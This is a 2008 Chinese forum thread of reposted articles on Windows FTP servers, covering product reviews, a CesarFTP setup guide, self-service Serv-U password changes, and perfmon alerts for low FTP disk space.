ArGoSoft FTP Server的未注册版本会在启动后一小时自动关闭,如果你想让他没有限制的运行,那需要注册费用99美元。
ArGoSoft FTP Server的安装文件还不到2M,安装也非常简单,基本上需要做的就是点"下一步"按纽。运行后,程序界面如下图,可以在这里查看服务器的日志和当前连接情况。
[align=center][img=486,372]http://edu.admin5.com/upimg/allimg/070109/1444390.jpg[/img][/align] 你可以简单的通过菜单和对话框设置用户和IP过滤规则。在用户添加对话框中你可以设定用户的主目录,密码和对目录的权限等,并在这里指定用户是否需要启用IP过滤。用户帐号也可以被指定可执行的S[wiki]IT[/wiki]E命令集,也即用户可以在服务器上直接执行的命令。一个常见的例子是ZIP/NUZIP命令,这些命令允许用户的FTP客户端在从服务器上传输文件前先把文件压缩或解压缩。另外,在这里还可以设定用户的磁盘配额。
[align=center][img]http://edu.admin5.com/upimg/allimg/070109/1444392.jpg[/img][/align] ArGoSoft FTP Server的IP过滤功能可以允许或禁止指定的IP或IP范围连接服务器。在对话框里,你可以添加一些IP范围然后指定对应的动作是禁止还是放行。你还可以指定是将IP过滤适用于全局还是特定用户。服务器还支持多IP主机,这样,当服务器有多个IP时,每个IP可以使用不同的配置。根据客户端请求的不同IP来使用不同的设置。仅管这增加了ArGoSoft FTP Server的灵活性,不过因为这个特性事实上较少使用,也许有人会认为不如把它换成一些更常用的服务器控制选项也许会更好。
[align=center][img]http://edu.admin5.com/upimg/allimg/070109/1444394.jpg[/img][/align] 优点:安装设置非常简单,管理界面直观明了,基本FTP功能完全具备。
缺点:对于有大量FTP用户的大型站点,现有的用户管理功能尙显薄弱。目前的价格相对一些价格更低功能更齐备的产品缺乏竞争力。
编者注:评估版本号为1.4.2.9
[/td][/tr][/table][table][tr][td=2,1][align=center][size=2]版本情况 [/size][/align][/td][/tr][tr][td=1,1,71][size=2]最新版本 [/size]
[/td][td=1,1,258][size=2]1.4.2.9 [/size]
[/td][/tr][tr][td=1,1,71][size=2]发布日期 [/size]
[/td][td=1,1,258][size=2]2005 年 3 月 30 日 [/size]
[/td][/tr][tr][td=1,1,71][size=2]得分
( 满分 5) [/size]
[/td][td=1,1,258][size=2]3.5 [/size]
[/td][/tr][tr][td=1,1,71][size=2]描述 [/size]
[/td][td=1,1,258][size=2]易于使用的 Windows 平台 FTP 服务器 [/size]
[/td][/tr][tr][td=1,1,71][size=2]下载 [/size]
[/td][td=1,1,258][size=2][color=#314150]http://www.argosoft.com/ftpserver/download.aspx[/color][/size][size=2] [/size]
[/td][/tr][tr][td=1,1,71][size=2]平台 [/size]
[/td][td=1,1,258][size=2]Alpha, Intel, Pentium [/size]
[/td][/tr][tr][td=1,1,71][size=2]操作系统 [/size]
[/td][td=1,1,258][size=2]Windows NT 4.0, Windows 95/98, Windows 2000 [/size]
[/td][/tr][tr][td=1,1,71][size=2]价格 [/size]
[/td][td=1,1,258][size=2]Shareware - $39; 1 hour limited trial download available [/size]
[/td][/tr][tr][td=1,1,71][size=2]公司 [/size]
[/td][td=1,1,258][size=2][color=#314150]ArGo Software Design [/color][/size]
[/td][/tr][tr][td=1,1,71][size=2]主页 [/size]
[/td][td=1,1,258][size=2][color=#314150]http://www.argosoft.com/ftpserver/[/color][/size][size=2] [/size]
[/td][/tr][/table][table=500][size=2][b]服务器特性[/b] [/size][tr][td][size=2][b]管理[/b]
图形界面设置
国形界面安装
远程管理
SNMP 管理/监控
[b]可扩展性/一些前瞻性的特性[/b]
.Net技术兼容
可移植到64位系统
支持集群
支持IPv6
J2EE 1.4认证
J2EE 1.4兼容t
[b]其它特性[/b]
多日志
支持Microsoft ISAPI
虚拟服务器
基于WEB的用户界面
[b]编程/脚本[/b]
包含源文件
有自己的API
自己的脚本语言/批处理语言
支持外部脚本/批处理语言
[/size][/td][/tr][/table]
chouqiu 2008-4-11 20:52
Secure FTP:安全的企业级FTP服务器
[table=548][tr][td]Secure FTP 服务器,提供安全的文件传输。 提起GlobalScape公司的CuteFTP软件家族,可以说是人尽皆知。这次要介绍的Secure FTP 服务器也属于GlobalScape公司的FTP软件产品线。也许是觉得CuteFTP这个名字不是很吸引企业用户,从2002年7月起,GlobalScape将CuteFTP产品线中的FTP服务器重命名为Secure FTP Server(安全FTP服务器)。它的服务器客户商仍然采用人们所熟知的CuteFTP命名。
Secure FTP 服务器的安装文件下载约4MB,安装后占大约6MB的空间。与现在动辄100GB以上的硬盘相比,实在占不了多少空间。它的安装向导很简单,在安装过程中会问你几个基本的问题,安装结束后服务器就可以立刻运行了。安装结束后,服务器会包含两个组件,windows服务和管理客户端。
管理客户端可以对本地或远程的Secure FTP 服务器提供管理,当然,如果要进行远程管理在远程系统中需要进行相关设置。管理界面设置的简洁明了,它把众多的Secure FTP服务器表现为一个树型结构,里面包含多个服务器,用户组和共享文件。不过,这个产品没有提供一个基于Web的管理界面,这在一定程度上限制上远程管理的使用。
如同它的名字一样,Secure FTP 服务器把它的着重点放在保证文件传输的完好性上。它包含了一些额外的特性来加强商业组织对文件传输的安全管理和控制。它的虚拟文件系统(Virtual File System/VFS)让管理员得以控制文件系统的访问权限。例如,服务器上的一个目录对内部用户而言有完全的访问权限(读,写,删除等),管理员可以设置当用户通过FTP访问这个目录时只具有读权限。另外,管理员可以为Secure FTP服务器的不同用户组指定不同的权限。
谈到用户组,Secure FTP在默认情况下使用一个内部的用户认证系统,不过,你也可以使用连接到ODBC用户数据库或活动目录服务来进行用户管理,这样,当在你的网络环境中进行集中化的用户管理时你不必单独维护一个FTP用户数据库。
Secure FTP的一个核心特点是它支持SSH2,SSH是"secure shell"的缩写,它是一个在服务器端与客户端进行加密通讯的系统。不使用SSH的服务器在传输用户名和密码之类的信息时是使用的明文,这就带来了一定的安全隐患,如果它们在网络上被截取你的系统有可能将受到攻击。SSH2协议为主机和客户生成密钥对,然后使用复杂的方法对网络上传输的数据进行加密。
GlobalScape让你使用图形界面管理工具方便的生成和管理密钥对,这个工具也让你可以选择多种加密方式和访问控制逻辑,不过,虽然Secure FTP将这个特性作为产品的一个核心特征进行宣传,它的SSH2特性功能却是产品的一个扩充软件包并且是单独收费的。
从一定程度上讲,对产品的命名基于一个需要额外收费的扩充功能显得有点奇怪了。不过Secure FTP还支持SSL--另一种安全连接技术。你也可以通过图形管理界面方便的对SSL认证进行设置。
[align=center][img]http://edu.admin5.com/upimg/allimg/070109/1443400.gif[/img][/align] 在安全之外,Secure FTP的另一个企业看重的特色功能是支持基于事件的规则定义。使用[wiki]后台[/wiki]的自动化系统,你可以让服务器在特定事件发生时进行指定的操作。例如,你可以创建一条规则在指定文件被上传或下载后给给你发EMAIL,你也可以创建时间规则在指定的时间段启用加密传输。
如果不考虑那个你需要额外购买的补充软件包,Secure FTP的价格还是比较合理的,对于那些对文件传输安全性有特别要求的企业,这款产品物有所值。
优点:易用的管理界面,支持SSH,方案的事件响应功能,合理的价格。
缺点:缺乏基于Web的远程管理界面,SSH功能需要额外收费。
编者注:文中的评估版本是号是2.0
[/td][/tr][/table][table=548][tr][td][/td][/tr][/table][table=548][tr][td=1,1,8][/td][td][table][tr][td=2,1][size=2]版本情况 [/size]
[/td][/tr][tr][td=1,1,71][size=2]最新版本 [/size]
[/td][td=1,1,258][size=2]3.0 [/size]
[/td][/tr][tr][td=1,1,71][size=2]发布日期 [/size]
[/td][td=1,1,258][size=2]2005 年 3 月 23 日 [/size]
[/td][/tr][tr][td=1,1,71][size=2]得分
( 满分 5) [/size]
[/td][td=1,1,258][size=2]4.5 [/size]
[/td][/tr][tr][td=1,1,71][size=2]描述 [/size]
[/td][td=1,1,258][size=2]有附加安全特性的 FTP 服务器 [/size]
[/td][/tr][tr][td=1,1,71][size=2]下载 [/size]
[/td][td=1,1,258][size=2][color=#314150]http://www.globalscape.com/downloads/gsftps.asp[/color][/size][size=2] [/size]
[/td][/tr][tr][td=1,1,71][size=2]平台 [/size]
[/td][td=1,1,258][size=2]Alpha, Intel, Pentium [/size]
[/td][/tr][tr][td=1,1,71][size=2]操作系统 [/size]
[/td][td=1,1,258][size=2]Windows NT 4.0, Windows 2000, Windows XP, Windows Server 2003 [/size]
[/td][/tr][tr][td=1,1,71][size=2]价格 [/size]
[/td][td=1,1,258][size=2]评估版免费 ; 基础功能软件包 495 美元, for optional SSH2 (SFTP) 附加功能软件包加收 245 美元 [/size]
[/td][/tr][tr][td=1,1,71][size=2]公司 [/size]
[/td][td=1,1,258][size=2][color=#314150]GlobalSCAPE [/color][/size]
[/td][/tr][tr][td=1,1,71][size=2]主页 [/size]
[/td][td=1,1,258][size=2][color=#314150]http://www.globalscape.com/pro... [/color][/size]
[/td][/tr][/table][table=500][size=2][b]服务器特性[/b] [/size][tr][td][size=2][b]管理[/b]
图形界面设置
国形界面安装
远程管理
SNMP 管理/监控
[b]可扩展性/一些前瞻性的特性[/b]
.Net技术兼容
可移植到64位系统
支持集群
支持IPv6
J2EE 1.4认证
J2EE 1.4兼容t
[b]其它特性[/b]
多日志
支持Microsoft ISAPI
虚拟服务器
基于WEB的用户界面
[b]编程/脚本[/b]
包含源文件
有自己的API
自己的脚本语言/批处理语言
支持外部脚本/批处理语言
[/size][/td][/tr][/table][/td][/tr][/table]
chouqiu 2008-4-11 20:53
使用CesarFTP架设FTP服务器
[table=548][tr][td]CesarFTP是一款非常优秀的免费FTP服务器端软件,虽然它的体积很小,但功能却非常完善。它的安装非常简单,不需要像其它FTP服务器软件那样经过复杂的系统配置才能使用,安装完成后FTP服务器就可以正常启动,特别适合一般用户的使用。下面我们就用CesarFTP软件来架设FTP服务器。
[b]CesarFTP小档案 [/b]
软件名称:CesarFTP V0.99g汉化版
软件语言:简体中文
软件类型:服务器类
运行环境:Windows 9X/NT/2000/XP
授权方式:免费软件
软件大小:394KB
[b]设置CesarFTP服务器参数[/b]
CesarFTP程序安装完成后,运行安装目录中的“CesarFTP.exe”主程序就可以启动FTP服务(图1),CesarFTP主程序界面非常简单,很方便管理员的操作。在软件的安装过程中,对服务器配置是默认的,但这些FTP服务器默认参数并不能满足所有用户的需要,因此可以针对不同需要,定制合理的服务器参数。
[align=center][img]http://edu.admin5.com/upimg/allimg/070109/1425250.jpg[/img]
图 1[/align]
1.服务器通用设置
点击菜单选项栏的“设置→设置服务器”选项,或主工具栏的“服务器”图标按钮,弹出“通用服务器设置”窗口,切换到“通用设定”选项页,在这里我们对服务器最基本的几个参数进行设置(图2)。
[align=center][img]http://edu.admin5.com/upimg/allimg/070109/1425252.jpg[/img]
图 2[/align] (1)很多FTP服务器在用户登录时都会显示一些个性化欢迎信息,CesarFTP也提供了这项功能。在“服务器欢迎信息”输入框中进行欢迎信息的设置,如输入“欢迎访问我的FTP服务器”,然后点击“确定”按钮,这样用户在登录服务器时就会显示这些欢迎信息。
(2)如果你使用的操作系统是基于NT内核的,在启动选项栏中勾选“系统启动时运行”选项,在下拉列表框中选择“启动时运行服务器”,这样CesarFTP就可以随系统一起启动。
(3)在连接选项栏中,可以对FTP服务器的端口号和最大连接用户数进行设置,FTP服务器默认使用“21”号端口,但也可以根据自己的需要更改这个端口号,如在服务端口输入框中将端口号更改为“678”,一定要注意:使用的端口号不能和系统中其它的程序端口号相冲突。网络带宽资源是有限的,因此建议限制FTP服务器的最大用户连接数量,在“最大用户数量”输入框中输入合适的数值,如“100”,这样FTP服务器就最多支持100个用户同时登录了。为防止一些别有用心的非法用户反复尝试登录服务器,勾选“限制尝试登录”选项,在输入框中设置合理的数值,可以限制他们的反复登录次数。
(4)CesarFTP还支持远程控制,这对网络管理员来说是一个非常有用的功能,可以很方便地在远端维护服务器,在控制选项栏中勾选“允许远程控制”,远程控制默认使用的端口号是“8540”,然后在“口令”输入框中设置远程管理密码即可。在“杂项”栏中,勾选“用隐藏口令”选项,可以有效地控制服务器的安全。
2.黑名单列表
CesarFTP的黑名单列表功能非常强大,网络管理员可以通过自定义访问规则非常容易地对用户进行登录限制。
在“通用服务器设置”的窗口中切换到“黑名单列表”选项页(图3),服务器有“接受”和“拒绝”两种访问规则,设置访问规则的方法也有两种,一个是使用IP地址,一个是用主机名。例如,FTP服务器只接受IP地址为192.168.0.2站点上的用户登录,该用户机的主机名为RTJ,具体操作为:在下方的“添加规则”输入框中输入“192.168.0.2”,然后点击“接受”按钮即可,在“访问规则”列表框中显示“(+)192.168.0.2(IP)”规则,这样只有IP地址为192.168.0.2站点可以访问FTP服务器,如果该站点和服务器处在同一局域网中,还可以用主机名方法,在“添加规则”输入框中输入“RTJ”然后点击“接受”按钮即可“访问规则”列表框中显示“(+)RTJ(Host name)”规则。拒绝某一站点访问的方法和上面基本相同,不同之处是输入IP地址或主机名后,点击“拒绝”按钮。
[align=center][img]http://edu.admin5.com/upimg/allimg/070109/1425254.jpg[/img]
图 3[/align] 对于多个站点的接受和拒绝登录FTP服务器功能,通过多条访问规则就可以实现。访问规则的删除也很简单,选中访问规则,然后点击“删除”按钮即可。
小提示:在添加访问规则时一定要慎重,在使用拒绝规则和接受规则时,很容易造成管理混乱,建议网络管理员根据自己的需要选择合适的规则。
[/td][/tr][/table][table=548][tr][td=1,1,8][/td][td][size=3][b]CesarFTP服务器的用户管理[/b] [/size]
用户要登录FTP服务器共享资源,必须有合法的账号和相应的访问权限。
1.创建FTP用户账号
在CesarFTP主程序窗口中点击“设置→设置用户和组”,或单击主工具栏的“用户/组”图标按钮,弹出“用户和组设置”窗口,点击左下角“增加用户”按钮,然后在右边框体中创建账号,切换到“通用设置”选项页,在“用户名/组名”输入框中填写用户名,如“TJRAO”,然后勾选“启用账号”,在“登录”输入框中填写用户账号名,勾选“口令”,输入账号密码。如果创建的是匿名访问账号,点击“匿名访问”按钮即可。
接下来为该账号指定访问权限。点击“文件存取权限”按钮,在弹出的“CesarFTP浏览器”窗口中为用户创建虚拟目录(图4),创建非常简单,只需在CesarFTP浏览器界面中将本地硬盘中的文件夹用鼠标拖动到虚拟目录窗口中即可完成创建,且虚拟目录与真实目录以不同色彩区分,然后为用户账号指定文件和目录访问权限,如文件的读取、删除、写入和目录的建立、列表、访问子目录等权限。完成虚拟目录设置后,关闭CesarFTP浏览器,最后点击“确定”按钮就完成了账号的创建。
[align=center][img]http://edu.admin5.com/upimg/allimg/070109/1425256.jpg[/img]
图 4[/align] 另外,还可以启动磁盘配额限制用户使用FTP的空间,指定文件的上传和下载比例,限制账号登录FTP服务器的客户机的IP地址和主机名。
2.登录用户的管理
使用用户账号登录服务器后,CesarFTP服务器能记录所有登录用户的任何操作(图5),在“账号信息窗口”中显示登录用户的用户名、连接号、IP地址,“记录显示窗口”中显示详细的用户信息,对于不受欢迎的用户点击连接工具栏的“踢出”按钮,就能断开该用户与服务器的连接,或者点击“禁止”按钮,将其IP地址加入到黑名单列表的拒绝访问规则中。
[align=center][img]http://edu.admin5.com/upimg/allimg/070109/1425258.jpg[/img]
图 5[/align] 对于这么优秀的FTP服务软件还等什么,赶快一试吧!
[/td][/tr][/table]
chouqiu 2008-4-11 20:54
FTP出错解决和分析
发现文件在FTP中无法直接删除、改名、改变属性在linux的[wiki]虚拟主机[/wiki]中常会出现~
现在找到了解决办法(文末上传附件)
注意: 请慎重使用此程序,如因使用此程序导致您有任何损失,此程序作者、发帖人均不会对其负任何责任!
解压后里面包含两个工具:
1.File Manager_Web FTP,
File Manager帮助你直接修改文件,包括属性
用记事本打开 file_manager.php 修改密码,
上传到 FTP 中运行,输入密码后即可进行管理!
Web FTP,利用[wiki]web[/wiki]方式登陆FTP主机
上传到所有文件到ftp中,运行 webftp.php,进入后
主机 栏 写上你的ftp主机地址
端口 栏 ftp主机默认是 21
用户 栏 输入你的ftp主机所用账号
密码 栏 输入你的ftp主机所用账号的对应密码
然后点 登陆
即可轻松进入你的FTP主机!
2.del,
解压后只有一个 del.php文件,上传到 ftp中按照说明进行删除文件或目录
ps.只找到了解决办法~而此问题出现的原因尚不明 待考
chouqiu 2008-4-11 20:55
远程修改Serv-U FTP用户的登录密码
很多朋友使用FTP账号上传和下载文件,但为了自己账号的安全,用户需要每隔一段时间修改一次密码。通常情况下是由管理员在服务器端为我们修改,但这样操作很麻烦,其实用户自己也可以远程修改自己的FTP账号密码。
前提条件
首先要确保FTP服务器为该用户的账户提供了修改密码的权限。以最常见的FTP服务器软件“Serv-U”为例,设置账户的密码修改权限是非常简单的。现在我们给“[url=ftp://www.efujin.com/]FTP://www.efujin.com[/url]”这个FTP服务器的“tqxx”账号授予密码修改权限,在“Serv-U管理员”左边窗口的用户列表中找到“tqxx”账号,然后在右边的账号设置窗口中切换到“常规”选项页,勾选“允许用户修改密码”,然后单击“应用”图标即可。
修改方法
1. 点击“开始→运行”,输入“cmd”并回车。
2. 在DOS窗口内输入“ftp 218.106.99.127”并回车。
C:\Documents and Settings\Administrator>ftp 218.106.99.127
屏幕提示如下:
Connected to 218.106.99.127.
220 Serv-U FTP Server v5.1 for WinSock ready...
User (218.106.99.127:(none)):
3. 在光标处输入你的FTP用户的账号(如:tqxx)并回车。
屏幕提示:
User (218.106.99.127:(none)): tqxx
331 User name okay, need password.
Password:
4. 接着输入你的FTP账号的密码(如:tqxx001,请注意此处的密码并不显示)。
屏幕提示:
Password:
230 User logged in, proceed.
ftp>
5. 然后输入如下命令,即可将你的FTP账号的密码修改为“12345678”:
quote site pswd tqxx001 12345678
(注:命令格式为“quote site pswd 初始密码 修改密码”)
屏幕提示:
ftp> quote site pswd tqxx001 12345678
230 Password changed okay.
6. 屏幕提示“230 Password changed okay.”,说明密码修改成功。最后输入“quit”退出FTP登录。
屏幕提示:
ftp> quit
221 Goodbye!
是不是很简单?你也试试!
chouqiu 2008-4-11 20:57
FTP空间不足 Windows 系统性能监控来报警
精彩的大片当然要大家一起分享,上传到您的FTP空间中吧!方便朋友们下载和欣赏。但通常这些大片的体态“臃肿”,而FTP空间却是“有限”,久而久之,很有可能被“撑破”的危险。您当然不希望这种情况发生在你的身上,那就对FTP空间的剩余数量进行监控吧!一旦出现空间不足危险,立即给予警告提醒。恰恰Windows系统自带的“性能监控”功能就能做到,免去了使用第三方监控工具的麻烦。
[b]第一步 启用“性能”功能
[/b]在FTP服务器中,点击“开始→运行”,在“运行”对话框中输入“perfmon.msc”命令后回车,弹出“性能”管理主窗口。接着依次展开“性能日志和警报→警报”选项,下面就可以利用“新建警报设置”来监控FTP服务器空间的剩余数量,当FTP服务器剩余空间低于某个数值时,就向管理员报警,提示FTP空间不足的警告信息。
[b]第二步 新建警告设置[/b]
接下来笔者要新建一个警报设置,用来监控FTP空间所在的磁盘分区的磁盘空间剩余量。其监控原理是这样的,如笔者的FTP服务器的根目录位于E盘中,也就是说FTP服务器中的所有的文件一般都是存储在E盘中的,除虚拟目录外,这时就可以利用监控E盘的磁盘剩余量,来实现对FTP空间容量的监控。
在“性能”管理主窗口中,右键点击“警报”选项,在弹出的菜单中选择“新建警报设置”选项,弹出新建警报设置对话框,在“名称”栏中为该警报起个名称,如“FtpDisk”,点击“确定”按钮后,进入到警报参数设置对话框。
[b]第三步 警报参数设置
[/b]1. 添加计数器
在警报参数设置对话框中,点击“添加”按钮,弹出“添加计数器”对话框,因为FTP服务器是被安装在本地计算机中的,因此一定要选中“使用本地计算机计数器”单选项,接着在“性能对象”下拉列表框中选中“LogicalDisk”选项。
下面选中“从列表选中计数器”选项,接着在列表框中选中“%Free Space”,右侧框体中选中“E:”选项,最后点击“添加”按钮。
2. 警告参数和采样间隔
然后回到警报参数设置对话框中,接下来要设置触发警告参数和数据采样间隔参数。这里笔者要设置为剩余磁盘空间低于15%后,就向管理员发出警报。在“将触发警报,如果值是”下拉框中选择“低于”选项,在“限制”栏中输入“15”。
接着设置数据采样间隔值,这个间隔时间不要设置的过短,如设置为“5分钟”,在“间隔”栏中输入“5”,“单位”栏中选择“分钟”。
3. 指定警告目标机
最后还要切换到“操作”[wiki]标签[/wiki]页,在“当触发警报时”框体中选中“发送网络信息到”选项,然后在空白栏中输入,要接受警报信息的远程管理员机器的IP地址,如“192.168.1.28”,最后点击“确定”按钮,完成警报的创建。
小提示:远程管理员机器(192.168.1.28)要想正常接收FTP服务器的“剩余空间不足”警报信息,必须启用管理员机器中的“Messenger”服务。
完成了以上设置后,Windows系统自带的“性能监控”功能,就可以全天候的监视FTP服务器的剩余空间了,一旦剩余空间数低于15%,就会向远程管理员机器发出警告信息,提醒管理员注意,采取相应的处理措施。其实“性能监控”功能是非常强大的,以上只是介绍了冰山一角,它还可以监控Windows系统的内存、处理器等,有兴趣的朋友,不妨一试!
lanlanxin 2008-4-11 21:38
I[wiki]DC[/wiki]对这个很熟悉
FTP一般只用SU和IIS自带的
其他基本没有太用
长见识了 谢谢
页:
[1]
